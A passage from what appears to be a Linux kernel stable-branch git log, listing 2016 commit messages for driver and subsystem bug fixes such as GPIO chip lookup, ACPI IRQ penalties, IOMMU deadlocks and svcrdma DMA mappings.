Sylvain Lemieux reports the LPC32xx GPIO driver is broken since
commit 762c2e46c059 ("gpio: of: remove of_gpiochip_and_xlate() and
struct gg_data").  Probably, gpio-etraxfs.c and gpio-davinci.c are
broken too.

Those drivers register multiple gpio_chip that are associated to a
single OF node, and their own .of_xlate() checks if the passed
gpio_chip is valid.

Now, the problem is of_find_gpiochip_by_node() returns the first
gpio_chip found to match the given node.  So, .of_xlate() fails,
except for the first GPIO bank.

Reverting the commit could be a solution, but I do not want to go
back to the mess of struct gg_data.  Another solution here is to
take the match by a node pointer and the success of .of_xlate().
It is a bit clumsy to call .of_xlate twice; for gpio_chip matching
and for really getting the gpio_desc index.  Perhaps, our long-term
goal might be to convert the drivers to single chip registration,
but this commit will solve the problem until then.

Fixes: 762c2e46c059 ("gpio: of: remove of_gpiochip_and_xlate() and struct gg_data")
Signed-off-by: Masahiro Yamada <yamada.masahiro@socionext.com>
Reported-by: Sylvain Lemieux <slemieux.tyco@gmail.com>
Tested-by: David Lechner <david@lechnology.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agogpio/mvebu: Use irq_domain_add_linear
Jason Gunthorpe [Wed, 19 Oct 2016 21:03:41 +0000 (15:03 -0600)]
gpio/mvebu: Use irq_domain_add_linear

commit 812d47889a8e418d7bea9bec383581a34c19183e upstream.

This fixes the irq allocation in this driver to not print:
 irq: Cannot allocate irq_descs @ IRQ34, assuming pre-allocated
 irq: Cannot allocate irq_descs @ IRQ66, assuming pre-allocated

Which happens because the driver already called irq_alloc_descs()
and so the change to use irq_domain_add_simple resulted in calling
irq_alloc_descs() twice.

Modernize the irq allocation in this driver to use the
irq_domain_add_linear flow directly and eliminate the use of
irq_domain_add_simple/legacy

Fixes: ce931f571b6d ("gpio/mvebu: convert to use irq_domain_add_simple()")
Signed-off-by: Jason Gunthorpe <jgunthorpe@obsidianresearch.com>
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agobatman-adv: Modify neigh_list only with rcu-list functions
Sven Eckelmann [Thu, 29 Sep 2016 15:22:58 +0000 (17:22 +0200)]
batman-adv: Modify neigh_list only with rcu-list functions

commit 9ca488dd53088d4fcc97258aeeccf21f63b7da1e upstream.

The batadv_hard_iface::neigh_list is accessed via rcu based primitives.
Thus all operations done on it have to fulfill the requirements by RCU. So
using non-RCU mechanisms like hlist_add_head is not allowed because it
misses the barriers required to protect concurrent readers when accessing
the data behind the pointer.

Fixes: cef63419f7db ("batman-adv: add list of unique single hop neighbors per hard-interface")
Signed-off-by: Sven Eckelmann <sven.eckelmann@open-mesh.com>
Acked-by: Linus Lüssing <linus.luessing@c0d3.blue>
Signed-off-by: Simon Wunderlich <sw@simonwunderlich.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoACPI/PCI: pci_link: Include PIRQ_PENALTY_PCI_USING for ISA IRQs
Sinan Kaya [Mon, 24 Oct 2016 04:31:32 +0000 (00:31 -0400)]
ACPI/PCI: pci_link: Include PIRQ_PENALTY_PCI_USING for ISA IRQs

commit 98756f5319c64c883caa910dce702d9edefe7810 upstream.

Commit 103544d86976 ("ACPI,PCI,IRQ: reduce resource requirements")
replaced the addition of PIRQ_PENALTY_PCI_USING in acpi_pci_link_allocate()
with an addition in acpi_irq_pci_sharing_penalty(), but f7eca374f000
("ACPI,PCI,IRQ: separate ISA penalty calculation") removed the use
of acpi_irq_pci_sharing_penalty() for ISA IRQs.

Therefore, PIRQ_PENALTY_PCI_USING is missing from ISA IRQs used by
interrupt links.  Include that penalty by adding it in the
acpi_pci_link_allocate() path.

Fixes: f7eca374f000 (ACPI,PCI,IRQ: separate ISA penalty calculation)
Signed-off-by: Sinan Kaya <okaya@codeaurora.org>
Acked-by: Bjorn Helgaas <bhelgaas@google.com>
Tested-by: Jonathan Liu <net147@gmail.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoACPI/PCI: pci_link: penalize SCI correctly
Sinan Kaya [Mon, 24 Oct 2016 04:31:31 +0000 (00:31 -0400)]
ACPI/PCI: pci_link: penalize SCI correctly

commit f1caa61df2a3dc4c58316295c5dc5edba4c68d85 upstream.

Ondrej reported that IRQs stopped working in v4.7 on several
platforms.  A typical scenario, from Ondrej's VT82C694X/694X, is:

ACPI: Using PIC for interrupt routing
ACPI: PCI Interrupt Link [LNKA] (IRQs 1 3 4 5 6 7 10 *11 12 14 15)
ACPI: No IRQ available for PCI Interrupt Link [LNKA]
8139too 0000:00:0f.0: PCI INT A: no GSI

We're using PIC routing, so acpi_irq_balance == 0, and LNKA is already
active at IRQ 11. In that case, acpi_pci_link_allocate() only tries
to use the active IRQ (IRQ 11) which also happens to be the SCI.

We should penalize the SCI by PIRQ_PENALTY_PCI_USING, but
irq_get_trigger_type(11) returns something other than
IRQ_TYPE_LEVEL_LOW, so we penalize it by PIRQ_PENALTY_ISA_ALWAYS
instead, which makes acpi_pci_link_allocate() assume the IRQ isn't
available and give up.

Add acpi_penalize_sci_irq() so platforms can tell us the SCI IRQ,
trigger, and polarity directly and we don't have to depend on
irq_get_trigger_type().

Fixes: 103544d86976 (ACPI,PCI,IRQ: reduce resource requirements)
Link: http://lkml.kernel.org/r/201609251512.05657.linux@rainbow-software.org
Reported-by: Ondrej Zary <linux@rainbow-software.org>
Acked-by: Bjorn Helgaas <bhelgaas@google.com>
Signed-off-by: Sinan Kaya <okaya@codeaurora.org>
Tested-by: Jonathan Liu <net147@gmail.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoACPI/PCI/IRQ: assign ISA IRQ directly during early boot stages
Sinan Kaya [Mon, 24 Oct 2016 04:31:30 +0000 (00:31 -0400)]
ACPI/PCI/IRQ: assign ISA IRQ directly during early boot stages

commit eeaed4bb5a35591470b545590bb2f26dbe7653a2 upstream.

We do not want to store the SCI penalty in the acpi_isa_irq_penalty[]
table because acpi_isa_irq_penalty[] only holds ISA IRQ penalties and
there's no guarantee that the SCI is an ISA IRQ.  We add in the SCI
penalty as a special case in acpi_irq_get_penalty().

But if we called acpi_penalize_isa_irq() or acpi_irq_penalty_update()
for an SCI that happened to be an ISA IRQ, they stored the SCI
penalty (part of the acpi_irq_get_penalty() return value) in
acpi_isa_irq_penalty[].  Subsequent calls to acpi_irq_get_penalty()
returned a penalty that included *two* SCI penalties.

Fixes: 103544d86976 (ACPI,PCI,IRQ: reduce resource requirements)
Signed-off-by: Sinan Kaya <okaya@codeaurora.org>
Acked-by: Bjorn Helgaas <bhelgaas@google.com>
Tested-by: Jonathan Liu <net147@gmail.com>
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoACPI / APEI: Fix incorrect return value of ghes_proc()
Punit Agrawal [Tue, 18 Oct 2016 16:07:19 +0000 (17:07 +0100)]
ACPI / APEI: Fix incorrect return value of ghes_proc()

commit 806487a8fc8f385af75ed261e9ab658fc845e633 upstream.

Although ghes_proc() tests for errors while reading the error status,
it always return success (0). Fix this by propagating the return
value.

Fixes: d334a49113a4a33 (ACPI, APEI, Generic Hardware Error Source memory error support)
Signed-of-by: Punit Agrawal <punit.agrawa.@arm.com>
Tested-by: Tyler Baicar <tbaicar@codeaurora.org>
Reviewed-by: Borislav Petkov <bp@suse.de>
[ rjw: Subject ]
Signed-off-by: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agommc: sdhci-msm: Fix error return code in sdhci_msm_probe()
Wei Yongjun [Wed, 26 Oct 2016 15:04:41 +0000 (15:04 +0000)]
mmc: sdhci-msm: Fix error return code in sdhci_msm_probe()

commit d1f63f0c81c22ba705fcd149a1fcec37b734d818 upstream.

Fix to return a negative error code from the platform_get_irq_byname()
error handling case instead of 0, as done elsewhere in this function.

Fixes: ad81d3871004 ("mmc: sdhci-msm: Add support for UHS cards")
Signed-off-by: Wei Yongjun <weiyongjun1@huawei.com>
Acked-by: Adrian Hunter <adrian.hunter@intel.com>
Acked-by: Georgi Djakov <georgi.djakov@linaro.org>
Signed-off-by: Ulf Hansson <ulf.hansson@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoi40e: fix call of ndo_dflt_bridge_getlink()
Huaibin Wang [Mon, 26 Sep 2016 07:51:18 +0000 (09:51 +0200)]
i40e: fix call of ndo_dflt_bridge_getlink()

commit 599b076d15ee3ead7af20fc907079df00b2d59a0 upstream.

Order of arguments is wrong.
The wrong code has been introduced by commit 7d4f8d871ab1, but is compiled
only since commit 9df70b66418e.

Note that this may break netlink dumps.

Fixes: 9df70b66418e ("i40e: Remove incorrect #ifdef's")
Fixes: 7d4f8d871ab1 ("switchdev; add VLAN support for port's bridge_getlink")
CC: Carolyn Wyborny <carolyn.wyborny@intel.com>
Signed-off-by: Huaibin Wang <huaibin.wang@6wind.com>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Tested-by: Andrew Bowers <andrewx.bowers@intel.com>
Signed-off-by: Jeff Kirsher <jeffrey.t.kirsher@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agohwrng: core - Don't use a stack buffer in add_early_randomness()
Andrew Lutomirski [Mon, 17 Oct 2016 17:06:27 +0000 (10:06 -0700)]
hwrng: core - Don't use a stack buffer in add_early_randomness()

commit 6d4952d9d9d4dc2bb9c0255d95a09405a1e958f7 upstream.

hw_random carefully avoids using a stack buffer except in
add_early_randomness().  This causes a crash in virtio_rng if
CONFIG_VMAP_STACK=y.

Reported-by: Matt Mullins <mmullins@mmlx.us>
Tested-by: Matt Mullins <mmullins@mmlx.us>
Fixes: d3cc7996473a ("hwrng: fetch randomness only after device init")
Signed-off-by: Andy Lutomirski <luto@kernel.org>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agolib/genalloc.c: start search from start of chunk
Daniel Mentz [Fri, 28 Oct 2016 00:46:59 +0000 (17:46 -0700)]
lib/genalloc.c: start search from start of chunk

commit 62e931fac45b17c2a42549389879411572f75804 upstream.

gen_pool_alloc_algo() iterates over the chunks of a pool trying to find
a contiguous block of memory that satisfies the allocation request.

The shortcut

if (size > atomic_read(&chunk->avail))
continue;

makes the loop skip over chunks that do not have enough bytes left to
fulfill the request.  There are two situations, though, where an
allocation might still fail:

(1) The available memory is not contiguous, i.e.  the request cannot
    be fulfilled due to external fragmentation.

(2) A race condition.  Another thread runs the same code concurrently
    and is quicker to grab the available memory.

In those situations, the loop calls pool->algo() to search the entire
chunk, and pool->algo() returns some value that is >= end_bit to
indicate that the search failed.  This return value is then assigned to
start_bit.  The variables start_bit and end_bit describe the range that
should be searched, and this range should be reset for every chunk that
is searched.  Today, the code fails to reset start_bit to 0.  As a
result, prefixes of subsequent chunks are ignored.  Memory allocations
might fail even though there is plenty of room left in these prefixes of
those other chunks.

Fixes: 7f184275aa30 ("lib, Make gen_pool memory allocator lockless")
Link: http://lkml.kernel.org/r/1477420604-28918-1-git-send-email-danielmentz@google.com
Signed-off-by: Daniel Mentz <danielmentz@google.com>
Reviewed-by: Mathieu Desnoyers <mathieu.desnoyers@efficios.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agos390/dumpstack: restore reliable indicator for call traces
Heiko Carstens [Mon, 17 Oct 2016 09:08:31 +0000 (11:08 +0200)]
s390/dumpstack: restore reliable indicator for call traces

commit d0208639dbc6fe97a25054df44faa2d19aca9380 upstream.

Before merging all different stack tracers the call traces printed had
an indicator if an entry can be considered reliable or not.
Unreliable entries were put in braces, reliable not. Currently all
lines contain these extra braces.

This patch restores the old behaviour by adding an extra "reliable"
parameter to the callback functions. Only show_trace makes currently
use of it.

Before:
[    0.804751] Call Trace:
[    0.804753] ([<000000000017d0e0>] try_to_wake_up+0x318/0x5e0)
[    0.804756] ([<0000000000161d64>] create_worker+0x174/0x1c0)

After:
[    0.804751] Call Trace:
[    0.804753] ([<000000000017d0e0>] try_to_wake_up+0x318/0x5e0)
[    0.804756]  [<0000000000161d64>] create_worker+0x174/0x1c0

Fixes: 758d39ebd3d5 ("s390/dumpstack: merge all four stack tracers")
Signed-off-by: Heiko Carstens <heiko.carstens@de.ibm.com>
Signed-off-by: Martin Schwidefsky <schwidefsky@de.ibm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agortc: pcf2123: Add missing error code assignment before test
Christophe JAILLET [Tue, 9 Aug 2016 11:58:27 +0000 (13:58 +0200)]
rtc: pcf2123: Add missing error code assignment before test

commit 83ab7dad06b74e390c2ce0e7b5136daf286e1f5e upstream.

It is likely that checking the result of 'pcf2123_write_reg' is expected
here.
Also fix a small style issue. The '{' at the beginning of the function
is misplaced.

Fixes: 809b453b76e15 ("rtc: pcf2123: clean up writes to the rtc chip")
Signed-off-by: Christophe JAILLET <christophe.jaillet@wanadoo.fr>
Signed-off-by: Alexandre Belloni <alexandre.belloni@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoclk: samsung: clk-exynos-audss: Fix module autoload
Javier Martinez Canillas [Sun, 16 Oct 2016 13:45:07 +0000 (10:45 -0300)]
clk: samsung: clk-exynos-audss: Fix module autoload

commit 34b89b2967f284937be6759936ef3dc4d3aff2d0 upstream.

If the driver is built as a module, autoload won't work because the module
alias information is not filled. So user-space can't match the registered
device with the corresponding module.

Export the module alias information using the MODULE_DEVICE_TABLE() macro.

Before this patch:

$ modinfo drivers/clk/samsung/clk-exynos-audss.ko | grep alias
alias:          platform:exynos-audss-clk

After this patch:

$ modinfo drivers/clk/samsung/clk-exynos-audss.ko | grep alias
alias:          platform:exynos-audss-clk
alias:          of:N*T*Csamsung,exynos5420-audss-clockC*
alias:          of:N*T*Csamsung,exynos5420-audss-clock
alias:          of:N*T*Csamsung,exynos5410-audss-clockC*
alias:          of:N*T*Csamsung,exynos5410-audss-clock
alias:          of:N*T*Csamsung,exynos5250-audss-clockC*
alias:          of:N*T*Csamsung,exynos5250-audss-clock
alias:          of:N*T*Csamsung,exynos4210-audss-clockC*
alias:          of:N*T*Csamsung,exynos4210-audss-clock

Fixes: 4d252fd5719b ("clk: samsung: Allow modular build of the Audio Subsystem CLKCON driver")
Signed-off-by: Javier Martinez Canillas <javier@osg.samsung.com>
Reviewed-by: Krzysztof Kozlowski <krzk@kernel.org>
Tested-by: Krzysztof Kozlowski <krzk@kernel.org>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agox86/build: Fix build with older GCC versions
Jan Beulich [Mon, 24 Oct 2016 15:00:12 +0000 (09:00 -0600)]
x86/build: Fix build with older GCC versions

commit a2209b742e6cf978b85d4f31a25a269c3d3b062b upstream.

Older GCC (observed with 4.1.x) doesn't support -Wno-override-init and
also doesn't ignore unknown -Wno-* options.

Signed-off-by: Jan Beulich <jbeulich@suse.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: Valdis Kletnieks <valdis.kletnieks@vt.edu>
Cc: Valdis.Kletnieks@vt.edu
Fixes: 5e44258d16 "x86/build: Reduce the W=1 warnings noise when compiling x86 syscall tables"
Link: http://lkml.kernel.org/r/580E3E1C02000078001191C4@prv-mh.provo.novell.com
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoRevert "clocksource/drivers/timer_sun5i: Replace code by clocksource_mmio_init"
Chen-Yu Tsai [Tue, 18 Oct 2016 05:49:18 +0000 (13:49 +0800)]
Revert "clocksource/drivers/timer_sun5i: Replace code by clocksource_mmio_init"

commit 593876838826914a7e4e05fbbcb728be6fbc4d89 upstream.

struct clocksource is also used by the clk notifier callback, to
unregister and re-register the clocksource with a different clock rate.
clocksource_mmio_init does not pass back a pointer to the struct used,
and the clk notifier callback assumes that the struct clocksource in
struct sun5i_timer_clksrc is valid. This results in a kernel NULL
pointer dereference when the hstimer clock is changed:

Unable to handle kernel NULL pointer dereference at virtual address 00000004
[<c03a4678>] (clocksource_unbind) from [<c03a46d4>] (clocksource_unregister+0x2c/0x44)
[<c03a46d4>] (clocksource_unregister) from [<c0a6f350>] (sun5i_rate_cb_clksrc+0x34/0x3c)
[<c0a6f350>] (sun5i_rate_cb_clksrc) from [<c035ea50>] (notifier_call_chain+0x44/0x84)
[<c035ea50>] (notifier_call_chain) from [<c035edc0>] (__srcu_notifier_call_chain+0x44/0x60)
[<c035edc0>] (__srcu_notifier_call_chain) from [<c035edf4>] (srcu_notifier_call_chain+0x18/0x20)
[<c035edf4>] (srcu_notifier_call_chain) from [<c0670174>] (__clk_notify+0x70/0x7c)
[<c0670174>] (__clk_notify) from [<c06702c0>] (clk_propagate_rate_change+0xa4/0xc4)
[<c06702c0>] (clk_propagate_rate_change) from [<c0670288>] (clk_propagate_rate_change+0x6c/0xc4)

Revert the commit for now. clocksource_mmio_init can be made to pass back
a pointer, but the code churn and usage of an inner struct might not be
worth it.

Fixes: 157dfadef832 ("clocksource/drivers/timer_sun5i: Replace code by clocksource_mmio_init")
Reported-by: Maxime Ripard <maxime.ripard@free-electrons.com>
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Cc: linux-sunxi@googlegroups.com
Cc: Daniel Lezcano <daniel.lezcano@linaro.org>
Cc: linux-arm-kernel@lists.infradead.org
Link: http://lkml.kernel.org/r/20161018054918.26855-1-wens@csie.org
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agonvme: Delete created IO queues on reset
Keith Busch [Wed, 12 Oct 2016 15:22:16 +0000 (09:22 -0600)]
nvme: Delete created IO queues on reset

commit 7065906096273b39b90a512a7170a6697ed94b23 upstream.

The driver was decrementing the online_queues prior to attempting to
delete those IO queues, so the driver ended up not requesting the
controller delete any. This patch saves the online_queues prior to
suspending them, and adds that parameter for deleting io queues.

Fixes: c21377f8 ("nvme: Suspend all queues before deletion")
Signed-off-by: Keith Busch <keith.busch@intel.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Signed-off-by: Jens Axboe <axboe@fb.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosvcrdma: Tail iovec leaves an orphaned DMA mapping
Chuck Lever [Tue, 13 Sep 2016 14:52:50 +0000 (10:52 -0400)]
svcrdma: Tail iovec leaves an orphaned DMA mapping

commit cace564f8b6260e806f5e28d7f192fd0e0c603ed upstream.

The ctxt's count field is overloaded to mean the number of pages in
the ctxt->page array and the number of SGEs in the ctxt->sge array.
Typically these two numbers are the same.

However, when an inline RPC reply is constructed from an xdr_buf
with a tail iovec, the head and tail often occupy the same page,
but each are DMA mapped independently. In that case, ->count equals
the number of pages, but it does not equal the number of SGEs.
There's one more SGE, for the tail iovec. Hence there is one more
DMA mapping than there are pages in the ctxt->page array.

This isn't a real problem until the server's iommu is enabled. Then
each RPC reply that has content in that iovec orphans a DMA mapping
that consists of real resources.

krb5i and krb5p always populate that tail iovec. After a couple
million sent krb5i/p RPC replies, the NFS server starts behaving
erratically. Reboot is needed to clear the problem.

Fixes: 9d11b51ce7c1 ("svcrdma: Fix send_reply() scatter/gather set-up")
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agosvcrdma: Skip put_page() when send_reply() fails
Chuck Lever [Tue, 13 Sep 2016 14:52:59 +0000 (10:52 -0400)]
svcrdma: Skip put_page() when send_reply() fails

commit 9995237bba702281e0e8e677edd5bb225f4f6c30 upstream.

Message from syslogd@klimt at Aug 18 17:00:37 ...
 kernel:page:ffffea0020639b00 count:0 mapcount:0 mapping:          (null) index:0x0
Aug 18 17:00:37 klimt kernel: flags: 0x2fffff80000000()
Aug 18 17:00:37 klimt kernel: page dumped because: VM_BUG_ON_PAGE(page_ref_count(page) == 0)

Aug 18 17:00:37 klimt kernel: kernel BUG at /home/cel/src/linux/linux-2.6/include/linux/mm.h:445!
Aug 18 17:00:37 klimt kernel: RIP: 0010:[<ffffffffa05c21c1>] svc_rdma_sendto+0x641/0x820 [rpcrdma]

send_reply() assigns its page argument as the first page of ctxt. On
error, send_reply() already invokes svc_rdma_put_context(ctxt, 1);
which does a put_page() on that very page. No need to do that again
as svc_rdma_sendto exits.

Fixes: 3e1eeb980822 ("svcrdma: Close connection when a send error occurs")
Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agomei: bus: fix received data size check in NFC fixup
Alexander Usyskin [Mon, 31 Oct 2016 17:02:39 +0000 (19:02 +0200)]
mei: bus: fix received data size check in NFC fixup

commit 582ab27a063a506ccb55fc48afcc325342a2deba upstream.

NFC version reply size checked against only header size, not against
full message size. That may lead potentially to uninitialized memory access
in version data.

That leads to warnings when version data is accessed:
drivers/misc/mei/bus-fixup.c: warning: '*((void *)&ver+11)' may be used uninitialized in this function [-Wuninitialized]:  => 212:2

Reported in
Build regressions/improvements in v4.9-rc3
https://lkml.org/lkml/2016/10/30/57

Fixes: 59fcd7c63abf (mei: nfc: Initial nfc implementation)
Signed-off-by: Alexander Usyskin <alexander.usyskin@intel.com>
Signed-off-by: Tomas Winkler <tomas.winkler@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoperf top: Fix refreshing hierarchy entries on TUI
Namhyung Kim [Fri, 7 Oct 2016 05:04:12 +0000 (14:04 +0900)]
perf top: Fix refreshing hierarchy entries on TUI

commit c611152373e84a7677cd7d496e849de4debdab66 upstream.

Markus reported that 'perf top --hierarchy' cannot scroll down after
refresh.  This was because the number of entries are not updated when
hierarchy is enabled.

Unlike normal report view, hierarchy mode needs to keep its own entry
count since it can have non-leaf entries which can expand/collapse.

Reported-and-Tested-by: Markus Trippelsdorf <markus@trippelsdorf.de>
Signed-off-by: Namhyung Kim <namhyung@kernel.org>
Tested-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Cc: Andi Kleen <andi@firstfloor.org>
Cc: Jiri Olsa <jolsa@kernel.org>
Cc: Peter Zijlstra <a.p.zijlstra@chello.nl>
Fixes: f5b763feebe9 ("perf hists browser: Count number of hierarchy entries")
Link: http://lkml.kernel.org/r/20161007050412.3000-1-namhyung@kernel.org
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoInput: synaptics-rmi4 - fix error handling in I2C transport driver
Guenter Roeck [Tue, 4 Oct 2016 18:50:54 +0000 (11:50 -0700)]
Input: synaptics-rmi4 - fix error handling in I2C transport driver

commit 261d7794c49b9a3bb5115c5ffc452e00f969bf43 upstream.

Instantiating the rmi4 I2C transport driver without interrupts assigned
(for example using manual i2c instantiation from the command line)
caused the driver to fail to load, but it does not clean up its regulator
or transport device registrations. Result is a crash at a later time,
for example when rebooting the system.

Fixes: 946c8432aab0 ("Input: synaptics-rmi4 - support regulator supplies")
Cc: Bjorn Andersson <bjorn.andersson@linaro.org>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoInput: synaptics-rmi4 - fix error handling in SPI transport driver
Guenter Roeck [Tue, 4 Oct 2016 18:48:55 +0000 (11:48 -0700)]
Input: synaptics-rmi4 - fix error handling in SPI transport driver

commit bbc2ceeb3220e54c7574f0b5e3a252fd9a62cf8a upstream.

Instantiating the rmi4 SPI transport driver without an interrupt assigned
caused the driver to fail to load, but it does not clean up its transport
device registration. Result may be a crash at a later time, for example
when rebooting the system.

Fixes: 8d99758dee31 ("Input: synaptics-rmi4 - add SPI transport driver")
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Dmitry Torokhov <dmitry.torokhov@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agowatchdog: core: Fix devres_alloc() allocation size
Guenter Roeck [Wed, 10 Aug 2016 05:34:31 +0000 (22:34 -0700)]
watchdog: core: Fix devres_alloc() allocation size

commit 2e91838bf7ffdedabdb29e091207d6531d04ef4f upstream.

Coverity reports:

Passing argument 152UL /* sizeof (*wdd) */ to function __devres_alloc_node
and then casting the return value to struct watchdog_device ** is
suspicious.

Allocation size needs to be sizeof(*rcwdd), not sizeof(*wdd).

Fixes: 83fbae5a148c ("watchdog: Add a device managed API for ...")
Cc: Neil Armstrong <narmstrong@baylibre.com>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Acked-by: Neil Armstrong <narmstrong@baylibre.com>
Signed-off-by: Wim Van Sebroeck <wim@iguana.be>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoagp/intel: Flush chipset writes after updating a single PTE
Chris Wilson [Thu, 18 Aug 2016 16:16:41 +0000 (17:16 +0100)]
agp/intel: Flush chipset writes after updating a single PTE

commit 3497971a71d8b15a41b7bf2bf66ebf5909b2bd3f upstream.

After we update one PTE for a page, the caller expects to be able to
immediately use that through a GGTT read/write. To comply with the
callers expectations we therefore need to flush the chipset buffers
before returning.

Reported-by: Matti Hämäläinen <ccr@tnsp.org>
Fixes: d6473f566417 ("drm/i915: Add support for mapping an object page...")
Signed-off-by: Chris Wilson <chris@chris-wilson.co.uk>
Cc: Ankitprasad Sharma <ankitprasad.r.sharma@intel.com>
Cc: Tvrtko Ursulin <tvrtko.ursulin@intel.com>
Tested-by: Matti Hämäläinen <ccr@tnsp.org>
Cc: drm-intel-fixes@lists.freedesktop.org
Reviewed-by: Mika Kuoppala <mika.kuoppala@intel.com>
Link: http://patchwork.freedesktop.org/patch/msgid/20160818161718.27187-2-chris@chris-wilson.co.uk
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoiommu/vt-d: Fix dead-locks in disable_dmar_iommu() path
Joerg Roedel [Tue, 8 Nov 2016 14:08:26 +0000 (15:08 +0100)]
iommu/vt-d: Fix dead-locks in disable_dmar_iommu() path

commit bea64033dd7b5fb6296eda8266acab6364ce1554 upstream.

It turns out that the disable_dmar_iommu() code-path tried
to get the device_domain_lock recursivly, which will
dead-lock when this code runs on dmar removal. Fix both
code-paths that could lead to the dead-lock.

Fixes: 55d940430ab9 ('iommu/vt-d: Get rid of domain->iommu_lock')
Signed-off-by: Joerg Roedel <jroedel@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoiommu/amd: Free domain id when free a domain of struct dma_ops_domain
Baoquan He [Thu, 15 Sep 2016 08:50:52 +0000 (16:50 +0800)]
iommu/amd: Free domain id when free a domain of struct dma_ops_domain

commit c3db901c54466a9c135d1e6e95fec452e8a42666 upstream.

The current code missed freeing domain id when free a domain of
struct dma_ops_domain.

Signed-off-by: Baoquan He <bhe@redhat.com>
Fixes: ec487d1a110a ('x86, AMD IOMMU: add domain allocation and deallocation functions')
Signed-off-by: Joerg Roedel <jroedel@suse.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoiommu/io-pgtable-arm: Check for v7s-incapable systems
Robin Murphy [Tue, 13 Sep 2016 17:02:02 +0000 (18:02 +0100)]
iommu/io-pgtable-arm: Check for v7s-incapable systems

commit 82db33dc5e49fb625262d81125625d07a0d6184e upstream.

On machines with no 32-bit addressable RAM whatsoever, we shouldn't
even touch the v7s format as it's never going to work.

Fixes: e5fc9753b1a8 ("iommu/io-pgtable: Add ARMv7 short descriptor support")
Reported-by: Eric Auger <eric.auger@redhat.com>
Tested-by: Eric Auger <eric.auger@redhat.com>
Signed-off-by: Robin Murphy <robin.murphy@arm.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
7 years agoxprtrdma: Fix DMAR failure in frwr_op_map() after reconnect
Chuck Lever [Mon, 7 Nov 2016 21:16:24 +0000 (16:16 -0500)]
xprtrdma: Fix DMAR failure in frwr_op_map() after reconnect

commit 62bdf94a2049822ef8c6d4b0e83cd9c3a1663ab4 upstream.

When a LOCALINV WR is flushed, the frmr is marked STALE, then
frwr_op_unmap_sync DMA-unmaps the frmr's SGL. These STALE frmrs
are then recovered when frwr_op_map hunts for an INVALID frmr to
use.

All other cases that need frmr recovery leave that SGL DMA-mapped.
The FRMR recovery path unconditionally DMA-unmaps the frmr's SGL.

To avoid DMA unmapping the SGL twice for flushed LOCAL_INV WRs,
alter the recovery logic (rather than the hot frwr_op_unmap_sync
path) to distinguish among these cases. This solution also takes
care of the case where multiple LOCAL_INV WRs are issued for the
same rpcrdma_req, some complete successfully, but some are flushed.

